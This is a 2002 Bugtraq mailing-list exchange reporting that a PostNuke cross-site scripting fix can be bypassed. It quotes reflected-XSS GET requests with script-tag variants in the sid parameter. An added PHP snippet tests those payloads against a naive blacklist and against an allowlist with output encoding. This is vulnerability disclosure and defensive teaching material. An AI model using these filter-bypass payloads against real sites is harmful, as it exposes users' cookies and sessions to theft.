Bugtraq
mailing list archives
Re: Postnuke XSS fixed
From: Sebastian Konstanty Zdrojewski <s.zdrojewski () not2you com>
Date: Thu, 03 Oct 2002 09:10:23 +0200
I saw the problem has been solved, and the GETs you proposed below are no
longer working. But if you use the following GET, the popup appears again:
on the URL http://news.postnuke.com/modules.php
the GET
?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script+>
Best Regards,
Sebastian
Daniel Woods wrote:
>Humm!
>
>Not so fast on the praise :(
>
>It only took me a couple of workarounds to find ways to bypass the check.
>
> http://news.postnuke.com/modules.php
> ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>
>Using the request...
> ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
>gives me the DB Error: message
>
>And using the request...
> ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
>gives me the Alert Popup and DB Error: message... the '+' is treated as a blank.
>
>Thanks... Dan.
--
Sebastian Konstanty Zdrojewski
IT Analyst
Neticon a brand of Every Level S.r.l.
Via Valtellina 16 - 20159 Milano - MI - Italy
Phone (+39) 02.68.80.731
E-Mail s.zdrojewski () neticon it
Website http://www.neticon.it
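
Added example, not part of the original messages and not PostNuke code: the sid values quoted in this thread run through a tag-matching blacklist and through an integer allowlist with output encoding. The function `naive_blacklist()` is a hypothetical stand-in for the kind of check being bypassed (the real check is not shown in the thread), and `valid_sid()` assumes that an article id is a short decimal number.

```php
<?php
// Added illustration; not PostNuke code. naive_blacklist() is a hypothetical
// stand-in for a tag-matching check; the real one is not shown in the thread.

function naive_blacklist(string $sid): bool
{
    // Accepts the value unless it contains the exact literal tag pair.
    return preg_match('/<script>.*<\/script>/is', $sid) !== 1;
}

function valid_sid(string $sid): bool
{
    // Allowlist (assumption): an article id is 1 to 10 ASCII digits.
    return $sid !== '' && strlen($sid) <= 10 && ctype_digit($sid);
}

// Raw query-string values for sid as quoted in the thread, plus one
// constructed normal id for comparison.
$samples = [
    '42',
    '<script>alert(document.cookie);</script>',
    '<\script>alert(document.cookie);</script>',
    '<script+>alert(document.cookie);</script>',
    '<script>alert(document.cookie);</script+>',
];

foreach ($samples as $raw) {
    // '+' decodes to a space, the same decoding PHP applies to $_GET values.
    $sid = urldecode($raw);

    printf(
        "%-46s blacklist=%-6s allowlist=%-6s\n    encoded for output: %s\n",
        $raw,
        naive_blacklist($sid) ? 'pass' : 'reject',
        valid_sid($sid) ? 'pass' : 'reject',
        // Encoding at output time keeps any value that does reach a page inert.
        htmlspecialchars($sid, ENT_QUOTES, 'UTF-8')
    );
}
```

Only the literal `<script>...</script>` pair is caught by the blacklist, while the `+` variants pass it because the decoded space changes the tag text; the allowlist rejects every non-numeric value regardless of how the tag is spelled.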